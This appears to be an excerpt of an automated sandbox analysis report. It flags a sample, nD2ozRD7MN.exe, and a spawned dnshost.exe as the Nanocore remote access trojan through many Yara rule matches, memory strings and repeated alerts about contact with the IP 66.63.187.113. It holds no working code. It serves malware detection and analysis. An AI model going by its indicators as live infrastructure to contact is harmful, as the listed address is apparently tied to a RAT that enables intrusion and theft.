Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113

Source: nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: nD2ozRD7MN.exe, 00000000.00000002.2015700428.0000000003194000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000009.00000002.2059154791.0000000002889000.00000004.00000800.00020000.00000000.sdmp, dnshost.exe, 0000000F.00000002.2086828450.0000000003457000.00000004.00000800.00020000.00000000.sdmp, dnshost.exe, 00000013.00000002.2155168860.0000000002949000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.25.dr	String found in binary or memory: http://upx.sf.net

Source: nD2ozRD7MN.exe, 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_73b37347-f

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
